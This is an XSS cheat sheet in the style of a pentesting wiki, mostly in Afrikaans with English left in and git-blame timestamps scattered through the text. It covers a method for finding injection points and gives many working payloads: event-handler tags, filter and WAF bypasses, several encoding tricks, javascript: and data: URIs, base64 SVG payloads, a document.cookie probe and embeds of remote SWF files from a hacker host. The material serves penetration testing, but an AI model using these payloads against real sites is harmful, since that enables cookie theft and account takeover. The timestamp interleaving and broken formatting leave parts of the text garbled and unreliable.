2024-02-18 14:51:58 +00:00
# XSS (Cross Site Scripting)
2022-04-28 16:01:33 +00:00
2024-09-22 16:51:03 +00:00
< figure > < img src = "../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-30 20:31:18 +00:00
2024-09-22 16:51:03 +00:00
As jy belangstel in 'n **hacking loopbaan** en die onhackable hack - **ons huur aan!** (_vloeiend Pools geskryf en gesproke vereis_).
2022-04-30 20:31:18 +00:00
2024-02-18 14:51:58 +00:00
{% embed url="https://www.stmcyber.com/careers" %}
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
## Metodologie
2024-07-19 16:15:11 +00:00
1. Kontroleer of **enige waarde wat jy beheer** (_parameters_, _pad_ , _koptekste_ ?, _koekies_ ?) **reflekteer** in die HTML of **gebruik** word deur **JS** kode.
2. **Vind die konteks** waar dit reflekteer/gebruikt word.
3. As dit **reflekteer**
1. Kontroleer **watter simbole jy kan gebruik** en berei die payload voor, afhangende daarvan:
1. In **rauwe HTML** :
1. Kan jy nuwe HTML-tags skep?
2024-06-14 10:18:18 +00:00
2. Kan jy gebeurtenisse of eienskappe gebruik wat die `javascript:` protokol ondersteun?
2024-07-19 16:15:11 +00:00
3. Kan jy beskermings omseil?
2024-09-19 16:41:42 +00:00
4. Word die HTML-inhoud geïnterpreteer deur enige kliëntkant JS-enjin (_AngularJS_, _VueJS_ , _Mavo_ ...), jy kan 'n [**Kliëntkant Sjabloon Inspuiting** ](../client-side-template-injection-csti.md ) misbruik.
2024-07-19 16:15:11 +00:00
5. As jy nie HTML-tags kan skep wat JS-kode uitvoer nie, kan jy 'n [**Dangling Markup - HTML scriptless injection** ](../dangling-markup-html-scriptless-injection/ ) misbruik?
2. Binne 'n **HTML-tag** :
1. Kan jy na die rauwe HTML-konteks ontsnap?
2024-06-14 10:18:18 +00:00
2. Kan jy nuwe gebeurtenisse/eienskappe skep om JS-kode uit te voer?
2024-07-19 16:15:11 +00:00
3. Ondersteun die eienskap waar jy vasgevang is JS-uitvoering?
4. Kan jy beskermings omseil?
2024-09-18 16:23:15 +00:00
3. Binne **JavaScript kode** :
1. Kan jy die `<script>` tag ontsnap?
2024-04-07 05:33:57 +00:00
2. Kan jy die string ontsnap en verskillende JS-kode uitvoer?
2024-09-19 16:41:42 +00:00
3. Is jou invoer in sjabloon literale \`\`?
2024-07-19 16:15:11 +00:00
4. Kan jy beskermings omseil?
4. Javascript **funksie** wat **uitgevoer** word
2024-04-07 05:33:57 +00:00
1. Jy kan die naam van die funksie aandui om uit te voer. bv.: `?callback=alert(1)`
2024-07-19 16:15:11 +00:00
4. As **gebruik** :
2024-09-22 16:51:03 +00:00
1. Jy kan 'n **DOM XSS** misbruik, let op hoe jou invoer beheer word en of jou **beheerde invoer deur enige sink gebruik word.**
2024-04-07 05:33:57 +00:00
2024-09-16 20:57:57 +00:00
Wanneer jy aan 'n komplekse XSS werk, mag jy dit interessant vind om te weet oor:
2022-04-25 12:04:04 +00:00
{% content-ref url="debugging-client-side-js.md" %}
[debugging-client-side-js.md ](debugging-client-side-js.md )
{% endcontent-ref %}
2024-07-19 16:15:11 +00:00
## Reflekteerde waardes
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Om suksesvol 'n XSS te misbruik, is die eerste ding wat jy moet vind 'n **waarde wat deur jou beheer word en wat reflekteer** in die webblad.
2020-07-15 15:43:14 +00:00
2024-09-18 16:23:15 +00:00
* **Intermediêr reflekteer**: As jy vind dat die waarde van 'n parameter of selfs die pad in die webblad reflekteer, kan jy 'n **Reflekteerde XSS** misbruik.
2024-09-19 16:41:42 +00:00
* **Gestoor en reflekteer**: As jy vind dat 'n waarde wat deur jou beheer word, op die bediener gestoor is en elke keer reflekteer wanneer jy 'n bladsy toegang, kan jy 'n **Gestoor XSS** misbruik.
2024-07-19 16:15:11 +00:00
* **Toegang via JS**: As jy vind dat 'n waarde wat deur jou beheer word, met JS toegang verkry word, kan jy 'n **DOM XSS** misbruik.
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
## Konteks
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Wanneer jy probeer om 'n XSS te misbruik, is die eerste ding wat jy moet weet **waar jou invoer reflekteer** . Afhangende van die konteks, sal jy in staat wees om arbitrêre JS-kode op verskillende maniere uit te voer.
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Rauwe HTML
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
As jou invoer **reflekteer op die rauwe HTML** bladsy, sal jy sommige **HTML-tags** moet misbruik om JS-kode uit te voer: `<img , <iframe , <svg , <script` ... dit is net 'n paar van die baie moontlike HTML-tags wat jy kan gebruik.\
2024-09-16 20:57:57 +00:00
Hou ook in gedagte [Kliëntkant Sjabloon Inspuiting ](../client-side-template-injection-csti.md ).
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Binne HTML-tags eienskap
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
As jou invoer binne die waarde van die eienskap van 'n tag reflekteer, kan jy probeer:
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
1. Om te **ontsnap van die eienskap en van die tag** (dan sal jy in die rauwe HTML wees) en nuwe HTML-tag te skep om te misbruik: `"><img [...]`
2024-07-19 16:15:11 +00:00
2. As jy **kan ontsnap van die eienskap maar nie van die tag nie** (`>` is geënkodeer of verwyder), afhangende van die tag kan jy ** 'n gebeurtenis skep** wat JS-kode uitvoer: `" autofocus onfocus=alert(1) x="`
2024-09-22 16:51:03 +00:00
3. As jy **nie kan ontsnap van die eienskap nie** (`"` word geënkodeer of verwyder), dan, afhangende van **watter eienskap** jou waarde reflekteer in **of jy die hele waarde beheer of net 'n deel** , sal jy in staat wees om dit te misbruik. Byvoorbeeld, as jy 'n gebeurtenis soos `onclick=` beheer, sal jy dit in staat wees om arbitrêre kode uit te voer wanneer dit geklik word. 'n Ander interessante **voorbeeld** is die eienskap `href` , waar jy die `javascript:` protokol kan gebruik om arbitrêre kode uit te voer: ** `href="javascript:alert(1)"` **
4. As jou invoer binne "**onuitputbare tags**" reflekteer, kan jy die ** `accesskey` ** truuk probeer om die kwesbaarheid te misbruik (jy sal 'n soort sosiale ingenieurswese nodig hê om dit te misbruik): ** `" accesskey="x" onclick="alert(1)" x="` **
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Vreemde voorbeeld van Angular wat XSS uitvoer as jy 'n klasnaam beheer:
2024-03-17 16:40:53 +00:00
```html
< div ng-app >
< strong class = "ng-init:constructor.constructor('alert(1)')()" > aaa< / strong >
< / div >
```
2024-09-16 20:57:57 +00:00
### Binne JavaScript kode
2020-07-15 15:43:14 +00:00
2024-09-16 20:57:57 +00:00
In hierdie geval word jou invoer weerspieël tussen ** `<script> [...] </script>` ** etikette van 'n HTML-bladsy, binne 'n `.js` lêer of binne 'n attribuut wat die ** `javascript:` ** protokol gebruik:
2023-02-07 10:56:16 +00:00
2024-09-19 16:41:42 +00:00
* As dit weerspieël word tussen ** `<script> [...] </script>` ** etikette, selfs al is jou invoer binne enige soort aanhalings, kan jy probeer om `</script>` in te voeg en uit hierdie konteks te ontsnap. Dit werk omdat die **blaaier eers die HTML etikette sal ontleed** en dan die inhoud, daarom sal dit nie opgemerk dat jou ingevoegde `</script>` etiket binne die HTML kode is nie.
2024-09-18 16:23:15 +00:00
* As dit weerspieël word **binne 'n JS string** en die laaste truuk werk nie, sal jy moet **uitgaan** van die string, **uitvoer** jou kode en **herbou** die JS kode (as daar enige fout is, sal dit nie uitgevoer word nie):
2024-07-19 16:15:11 +00:00
* `'-alert(1)-'`
* `';-alert(1)//`
* `\';alert(1)//`
2024-09-18 16:23:15 +00:00
* As dit weerspieël word binne sjabloon letterlikhede kan jy **JS uitdrukkings insluit** met die `${ ... }` sintaksis: `` var greetings = `Hello, ${alert(1)}` ``
2024-09-16 20:57:57 +00:00
* **Unicode kodering** werk om **geldige javascript kode** te skryf:
2023-02-07 10:56:16 +00:00
```javascript
\u{61}lert(1)
\u0061lert(1)
\u{0061}lert(1)
```
2022-06-24 08:34:11 +00:00
#### Javascript Hoisting
2024-07-19 16:15:11 +00:00
Javascript Hoisting verwys na die geleentheid om **funksies, veranderlikes of klasse te verklaar nadat hulle gebruik is sodat jy scenario's kan misbruik waar 'n XSS onverklaarde veranderlikes of funksies gebruik.** \
2024-02-11 02:07:06 +00:00
**Kyk na die volgende bladsy vir meer inligting:**
2022-06-24 08:34:11 +00:00
2023-12-25 17:29:41 +00:00
{% content-ref url="js-hoisting.md" %}
[js-hoisting.md ](js-hoisting.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
### Javascript Funksie
2022-06-23 12:12:25 +00:00
2024-09-22 16:51:03 +00:00
Verskeie webblaaie het eindpunte wat **die naam van die funksie om uit te voer as parameter aanvaar** . 'n Algemene voorbeeld om in die natuur te sien is iets soos: `?callback=callbackFunc` .
2022-06-23 12:12:25 +00:00
2024-07-19 16:15:11 +00:00
'n Goeie manier om uit te vind of iets wat direk deur die gebruiker gegee is, probeer om uitgevoer te word, is **om die param waarde te wysig** (byvoorbeeld na 'Vulnerable') en in die konsole te kyk vir foute soos:
2022-06-23 12:12:25 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 711 ) . png > )
2022-06-23 12:12:25 +00:00
2024-07-19 16:15:11 +00:00
As dit kwesbaar is, kan jy dalk ** 'n waarskuwing aktiveer** deur net die waarde te stuur: ** `?callback=alert(1)` **. Dit is egter baie algemeen dat hierdie eindpunte **die inhoud sal valideer** om slegs letters, syfers, punte en onderstrepings toe te laat (**`[\w\._]`**).
2022-06-23 12:12:25 +00:00
2024-07-19 16:15:11 +00:00
Tog, selfs met daardie beperking is dit steeds moontlik om 'n paar aksies uit te voer. Dit is omdat jy daardie geldige karakters kan gebruik om **enige element in die DOM te benader** :
2022-06-23 12:12:25 +00:00
2024-05-05 22:31:04 +00:00
![](< .. / . . / . gitbook / assets / image ( 747 ) . png > )
2022-06-23 12:12:25 +00:00
2024-02-11 02:07:06 +00:00
Sommige nuttige funksies hiervoor:
2022-06-23 12:12:25 +00:00
```
firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement
```
2024-07-19 16:15:11 +00:00
You can also try to **trigger Javascript functions** directly: `obj.sales.delOrders` .
2022-06-23 12:12:25 +00:00
2024-07-19 16:15:11 +00:00
However, usually the endpoints executing the indicated function are endpoints without much interesting DOM, **ander bladsye in die selfde oorsprong** will have a **meer interessante DOM** to perform more actions.
2022-06-23 12:12:25 +00:00
2024-07-19 16:15:11 +00:00
Therefore, in order to **misbruik maak van hierdie kwesbaarheid in 'n ander DOM** the **Same Origin Method Execution (SOME)** exploitation was developed:
2022-06-23 12:12:25 +00:00
{% content-ref url="some-same-origin-method-execution.md" %}
[some-same-origin-method-execution.md ](some-same-origin-method-execution.md )
{% endcontent-ref %}
2022-05-01 16:57:45 +00:00
### DOM
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
There is **JS code** that is using **onveilig** some **data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="dom-xss.md" %}
[dom-xss.md ](dom-xss.md )
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2024-07-19 16:15:11 +00:00
### **Universal XSS**
2021-05-27 11:59:23 +00:00
2024-09-19 16:41:42 +00:00
These kind of XSS can be found **oorals** . They not depend just on the client exploitation of a web application but on **enige** **konteks** . These kind of **arbitrary JavaScript execution** can even be abuse to obtain **RCE** , **lees** **arbitraire** **lêers** in clients and servers, and more.\
2024-07-19 16:15:11 +00:00
Some **voorbeelde** :
2021-05-27 11:59:23 +00:00
2021-10-18 11:21:18 +00:00
{% content-ref url="server-side-xss-dynamic-pdf.md" %}
[server-side-xss-dynamic-pdf.md ](server-side-xss-dynamic-pdf.md )
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2023-10-27 16:04:24 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-web/electron-desktop-apps/" %}
[electron-desktop-apps ](../../network-services-pentesting/pentesting-web/electron-desktop-apps/ )
2021-10-18 11:21:18 +00:00
{% endcontent-ref %}
2021-05-27 11:59:23 +00:00
2024-07-19 16:15:11 +00:00
## WAF bypass encoding image
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21 ](<../../.gitbook/assets/EauBb2EX0AERaNK (1 ).jpg>)
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
## Injecting inside raw HTML
2020-07-15 15:43:14 +00:00
2024-09-19 16:41:42 +00:00
When your input is reflected **binne die HTML-bladsy** or you can escape and inject HTML code in this context the **eerste** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **karakter** and check if it's being **HTML encoded** or **verwyder** of if it is **reflected without changes** . **Slegs in die laaste geval sal jy in staat wees om hierdie geval te benut** .\
2024-07-19 16:15:11 +00:00
For this cases also **hou in gedagte** [**Client Side Template Injection** ](../client-side-template-injection-csti.md )**.**\
2024-08-18 11:01:35 +00:00
_**Nota: 'n HTML-kommentaar kan gesluit word met\*\*\*\***** ** **`-->`**** ** **of \*\*\*\*****`--!>`**_
2024-04-06 18:08:38 +00:00
2024-07-19 16:15:11 +00:00
In this case and if no black/whitelisting is used, you could use payloads like:
2024-02-06 03:10:27 +00:00
```html
2020-07-15 15:43:14 +00:00
< script > alert ( 1 ) < / script >
< img src = x onerror = alert(1) / >
< svg onload = alert('XSS') >
```
2024-07-19 16:15:11 +00:00
Maar, as tags/atribute swart/blanklysiening gebruik word, sal jy moet **brute-force watter tags** jy kan skep.\
2024-09-22 16:51:03 +00:00
Sodra jy **gevind het watter tags toegelaat word** , sal jy moet **brute-force attribuut/geleenthede** binne die gevonde geldige tags om te sien hoe jy die konteks kan aanval.
2024-04-06 18:08:38 +00:00
2024-09-22 16:51:03 +00:00
### Tags/Geleenthede brute-force
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
Gaan na [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet** ](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet ) en klik op _**Kopieer tags na klembord**_ . Stuur dan al hulle met Burp intruder en kyk of enige tags nie as kwaadwillig deur die WAF ontdek is nie. Sodra jy ontdek het watter tags jy kan gebruik, kan jy **brute force al die geleenthede** gebruik makend van die geldige tags (in dieselfde webblad klik op _**Kopieer geleenthede na klembord**_ en volg dieselfde prosedure as voorheen).
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Pasgemaakte tags
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
As jy nie enige geldige HTML tag gevind het nie, kan jy probeer om 'n **pasgemaakte tag** te **skep** en JS kode met die `onfocus` attribuut uit te voer. In die XSS versoek, moet jy die URL met `#` eindig om die bladsy **fokus op daardie objek** te maak en die kode te **uitvoer** :
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/?search=< xss + id % 3dx + onfocus % 3dalert ( document . cookie ) + tabindex % 3d1 > #x
```
2024-07-19 16:15:11 +00:00
### Blacklist Bypasses
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
As daar 'n soort swartlys gebruik word, kan jy probeer om dit te omseil met 'n paar dom truuks:
2020-07-15 15:43:14 +00:00
```javascript
//Random capitalization
< script > - - > < S c r I p T >
< img -- > < ImG
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Double tag, in case just the first match is removed
< script > < s c r i p t >
2021-06-02 22:22:26 +00:00
< scr < script > ipt>
2020-07-15 15:43:14 +00:00
< SCRscriptIPT > alert(1)< / SCRscriptIPT >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Unexpected parent tags
< svg > < x > < script > a l e r t ( ' 1 ' & # 4 1 < / x >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Unexpected weird attributes
< script x >
< script a = "1234" >
< script ~ ~ ~ >
2021-06-02 22:22:26 +00:00
< script / random > alert ( 1 ) < / script >
< script / / / Note the newline
>alert(1)< / script >
< scr \x00ipt > alert(1)</ scr \x00ipt >
2020-07-15 15:43:14 +00:00
//Not closing tag, ending with " < " or " //"
< iframe SRC = "javascript:alert('XSS');" <
< iframe SRC = "javascript:alert('XSS');" / /
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Extra open
< < script > alert ( "XSS" ) ; / / < < / script >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Just weird an unexpected, use your imagination
< < /script/script>< script >
< input type = image src onerror = "prompt(1)" >
2021-06-02 22:22:26 +00:00
2020-07-15 15:43:14 +00:00
//Using `` instead of parenthesis
2021-06-02 22:22:26 +00:00
onerror=alert`1`
2020-07-15 15:43:14 +00:00
//Use more than one
< < TexTArEa / * % 00 / / % 00 * / a = "not" / * % 00 / / / AutOFocUs / / / / onFoCUS = alert`1` / /
```
2024-07-19 16:15:11 +00:00
### Lengte omseiling (klein XSS's)
2020-07-15 15:43:14 +00:00
2022-02-18 15:49:34 +00:00
{% hint style="info" %}
2024-07-19 16:15:11 +00:00
**Meer klein XSS vir verskillende omgewings** payload [**kan hier gevind word** ](https://github.com/terjanq/Tiny-XSS-Payloads ) en [**hier** ](https://tinyxss.terjanq.me ).
2022-02-18 15:49:34 +00:00
{% endhint %}
```html
<!-- Taken from the blog of Jorge Lajara -->
2020-07-15 15:43:14 +00:00
< svg / onload = alert`` >
< script src = //aa.es >
< script src = //℡㏛.pw >
```
2024-07-19 16:15:11 +00:00
The last one is using 2 unicode characters which expands to 5: telsr\
More of these characters can be found [here ](https://www.unicode.org/charts/normalization/ ).\
To check in which characters are decomposed check [here ](https://www.compart.com/en/unicode/U+2121 ).
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Klik XSS - Klikjacking
2020-07-15 15:43:14 +00:00
2024-09-19 16:41:42 +00:00
As jy om die kwesbaarheid te benut, die **gebruiker moet op 'n skakel of 'n vorm** met voorafgevulde data klik, kan jy probeer om [**Klikjacking te misbruik** ](../clickjacking.md#xss-clickjacking ) (as die bladsy kwesbaar is).
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Onmoontlik - Hangende Markup
2020-07-15 15:43:14 +00:00
2024-09-19 16:41:42 +00:00
As jy net dink dat **dit onmoontlik is om 'n HTML-tag met 'n attribuut te skep om JS-kode uit te voer** , moet jy [**Hangende Markup** ](../dangling-markup-html-scriptless-injection/ ) nagaan omdat jy die kwesbaarheid **kan benut** **sonder** om **JS** -kode uit te voer.
2020-07-15 15:43:14 +00:00
2024-09-19 16:41:42 +00:00
## Invoeging binne HTML-tag
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
### Binne die tag/ontsnapping van attribuutwaarde
2020-07-15 15:43:14 +00:00
2024-09-22 16:51:03 +00:00
As jy **binne 'n HTML-tag** is, is die eerste ding wat jy kan probeer om te **ontsnap** van die tag en sommige van die tegnieke wat in die [vorige afdeling ](./#injecting-inside-raw-html ) genoem word, te gebruik om JS-kode uit te voer.\
2024-09-19 16:41:42 +00:00
As jy **nie van die tag kan ontsnap nie** , kan jy nuwe attribuut binne die tag skep om te probeer om JS-kode uit te voer, byvoorbeeld deur 'n payload soos (_let op dat in hierdie voorbeeld dubbele aanhalings gebruik word om van die attribuut te ontsnap, jy sal dit nie nodig hê as jou invoer direk binne die tag weerspieël word_):
2022-03-21 17:05:35 +00:00
```bash
2020-07-15 15:43:14 +00:00
" autofocus onfocus=alert(document.domain) x="
2022-03-21 17:05:35 +00:00
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
2020-07-15 15:43:14 +00:00
```
2024-08-18 11:01:35 +00:00
**Stylingsgebeurtenisse**
2021-02-25 11:06:26 +00:00
```python
< p style = "animation: x;" onanimationstart = "alert()" > XSS< / p >
< p style = "animation: x;" onanimationend = "alert()" > XSS< / p >
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
< div style = "position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick = "alert(1)" > < / div >
#moving your mouse anywhere over the page (0-click-ish):
< div style = "position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover = "alert(1)" > < / div >
```
2024-09-22 16:51:03 +00:00
### Binne die attribuut
2021-02-25 11:06:26 +00:00
2024-08-18 11:01:35 +00:00
Selfs al **kan jy nie ontsnap uit die attribuut nie** (`"` word gekodeer of verwyder), afhangende van **watter attribuut** jou waarde weerspieël **as jy al die waarde of net 'n deel daarvan beheer** sal jy dit kan misbruik. By **voorbeeld** , as jy 'n gebeurtenis soos `onclick=` beheer, sal jy dit in staat stel om arbitrêre kode uit te voer wanneer dit geklik word.\
Nog 'n interessante **voorbeeld** is die attribuut `href` , waar jy die `javascript:` protokol kan gebruik om arbitrêre kode uit te voer: ** `href="javascript:alert(1)"` **
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
**Omseil binne gebeurtenis met HTML-kodering/URL-kodering**
2020-07-15 15:43:14 +00:00
2024-08-18 11:01:35 +00:00
Die **HTML gekodeerde karakters** binne die waarde van HTML-tags attribuut word **op tyd van uitvoering gedecodeer** . Daarom sal iets soos die volgende geldig wees (die payload is in vet): `<a id="author" href="http://none" onclick="var tracker='http://foo?` **`' -alert(1)-' `**`';">Gaan Terug </ a > `
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Let daarop dat **enige soort HTML-kodering geldig is** :
2020-07-15 15:43:14 +00:00
```javascript
//HTML entities
' -alert(1)-'
//HTML hex without zeros
& #x27-alert(1)-& #x27
//HTML hex with zeros
& #x00027-alert(1)-& #x00027
//HTML dec without zeros
& #39-alert(1)-& #39
//HTML dec with zeros
& #00039-alert(1)-& #00039
2023-03-03 17:26:17 +00:00
< a href = "javascript:var a=''-alert(1)-''" > a< / a >
< a href = "javascript:alert(2)" > a< / a >
< a href = "javascript:alert(3)" > a< / a >
2020-07-15 15:43:14 +00:00
```
2024-07-19 16:15:11 +00:00
**Let wel dat URL-kodering ook sal werk:**
2020-07-15 15:43:14 +00:00
```python
< a href = "https://example.com/lol%22onmouseover=%22prompt(1);%20img.png" > Click< / a >
```
2024-09-22 16:51:03 +00:00
**Omgewing binne gebeurtenis met Unicode-kodering**
2020-07-15 15:43:14 +00:00
```javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
< img src onerror = \u0061 \u006C \u0065 \u0072 \u0074(1) />
< img src onerror = \u{61} \u{6C} \u{65} \u{72} \u{74}(1) />
```
2024-09-18 16:23:15 +00:00
### Spesiale Protokolle Binne die attribuut
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Daar kan jy die protokolle ** `javascript:` ** of ** `data:` ** in sommige plekke gebruik om **arbitraire JS-kode** uit te voer. Sommige sal gebruikersinteraksie vereis en sommige nie.
2021-06-02 22:22:26 +00:00
```javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript: alert(1)
javascript: alert(1)
javascript: alert(1)
& #x6a& #x61& #x76& #x61& #x73& #x63& #x72& #x69& #x70& #x74& #x3aalert(1)
2024-02-11 02:07:06 +00:00
java //Note the new line
2021-06-02 22:22:26 +00:00
script:alert(1)
data:text/html,< script > alert ( 1 ) < / script >
DaTa:text/html,< script > alert ( 1 ) < / script >
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,< script > alert ( 1 ) < / script >
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
```
2024-02-11 02:07:06 +00:00
**Plekke waar jy hierdie protokolle kan inspuit**
2021-06-02 22:22:26 +00:00
2024-09-22 16:51:03 +00:00
**In die algemeen** kan die `javascript:` protokol **gebruik word in enige etiket wat die attribuut `href` aanvaar** en in **meeste** van die etikette wat die **attribuut `src`** aanvaar (maar nie `<img>` nie)
2021-07-17 21:10:13 +00:00
```markup
2021-06-02 22:22:26 +00:00
< a href = "javascript:alert(1)" >
< a href = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=" >
< form action = "javascript:alert(1)" > < button > send< / button > < / form >
< form id = x > < / form > < button form = "x" formaction = "javascript:alert(1)" > send< / button >
< object data = javascript:alert(3) >
< iframe src = javascript:alert(2) >
< embed src = javascript:alert(1) >
< object data = "data:text/html,<script>alert(5)</script>" >
< embed src = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type = "image/svg+xml" AllowScriptAccess = "always" > < / embed >
< embed src = "data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" > < / embed >
< iframe src = "data:text/html,<script>alert(5)</script>" > < / iframe >
//Special cases
2024-02-11 02:07:06 +00:00
< object data = "//hacker.site/xss.swf" > .//https://github.com/evilcos/xss.swf
< embed code = "//hacker.site/xss.swf" allowscriptaccess = always > //https://github.com/evilcos/xss.swf
2021-06-02 22:22:26 +00:00
< iframe srcdoc = "<svg onload=alert(4);>" >
```
2024-07-19 16:15:11 +00:00
**Ander obfuskerings truuks**
2021-06-02 22:22:26 +00:00
2024-07-19 16:15:11 +00:00
_**In hierdie geval is die HTML-kodering en die Unicode-kodering truuk van die vorige afdeling ook geldig aangesien jy binne 'n attribuut is.**_
2021-06-02 22:22:26 +00:00
```javascript
< a href = "javascript:var a=''-alert(1)-''" >
```
2024-09-22 16:51:03 +00:00
Boonop, daar is nog 'n **lekker truuk** vir hierdie gevalle: **Selfs al word jou invoer binne `javascript:...` URL-gecodeer, sal dit URL-dekodeer word voordat dit uitgevoer word.** So, as jy moet **ontsnap** van die **string** met 'n **enkele aanhaling** en jy sien dat **dit URL-gecodeer word** , onthou dat **dit nie saak maak nie,** dit sal as 'n **enkele aanhaling** geïnterpreteer word tydens die **uitvoering** .
2020-07-15 15:43:14 +00:00
```javascript
' -alert(1)-'
%27-alert(1)-%27
< iframe src = javascript:%61%6c%65%72%74%28%31%29 > < / iframe >
```
2024-09-22 16:51:03 +00:00
Let daarop dat as jy probeer om **albei** `URLencode + HTMLencode` in enige volgorde te gebruik om die **payload** te kodifiseer, dit **nie** **sal** **werk** nie, maar jy kan **hulle meng binne die payload** .
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
**Gebruik Hex en Octal kodering met `javascript:` **
2020-07-15 15:43:14 +00:00
2024-07-19 16:15:11 +00:00
Jy kan **Hex** en **Octal kodering** binne die `src` attribuut van `iframe` (ten minste) gebruik om **HTML-tags te verklaar om JS uit te voer** :
2020-07-15 15:43:14 +00:00
```javascript
//Encoded: < svg onload = alert(1) >
// This WORKS
< iframe src = javascript:' \x3c \x73 \x76 \x67 \x20 \x6f \x6e \x6c \x6f \x61 \x64 \x3d \x61 \x6c \x65 \x72 \x74 \x28 \x31 \x29 \x3e' />
< iframe src = javascript:' \74 \163 \166 \147 \40 \157 \156 \154 \157 \141 \144 \75 \141 \154 \145 \162 \164 \50 \61 \51 \76' />
//Encoded: alert(1)
// This doesn't work
< svg onload = javascript:' \x61 \x6c \x65 \x72 \x74 \x28 \x31 \x29' />
< svg onload = javascript:' \141 \154 \145 \162 \164 \50 \61 \51' />
```
2024-06-14 11:10:02 +00:00
### Omgekeerde tab-nabbing
2020-07-15 15:43:14 +00:00
```javascript
2021-06-02 22:22:26 +00:00
< a target = "_blank" rel = "opener"
2020-07-15 15:43:14 +00:00
```
2024-08-18 11:01:35 +00:00
